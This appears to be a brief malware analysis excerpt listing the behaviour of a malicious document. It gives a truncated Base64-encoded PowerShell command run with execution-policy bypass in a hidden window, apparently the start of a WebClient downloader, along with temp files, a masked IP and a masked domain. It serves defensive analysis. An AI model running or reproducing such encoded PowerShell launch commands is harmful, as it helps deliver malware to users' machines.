Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -Exec Bypass -NoExit -EC JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQB...
- <Current directory>\~wrd0000.tmp
- <Current directory>\~wrd0001.tmp
- <Current directory>\~wrd0000.tmp
- <PATH_SAMPLE>.doc
- '17#.#2.33.145':80
- DNS ASK fo###oudal.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -Exec Bypass -NoExit -EC JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQB...' (with hidden window)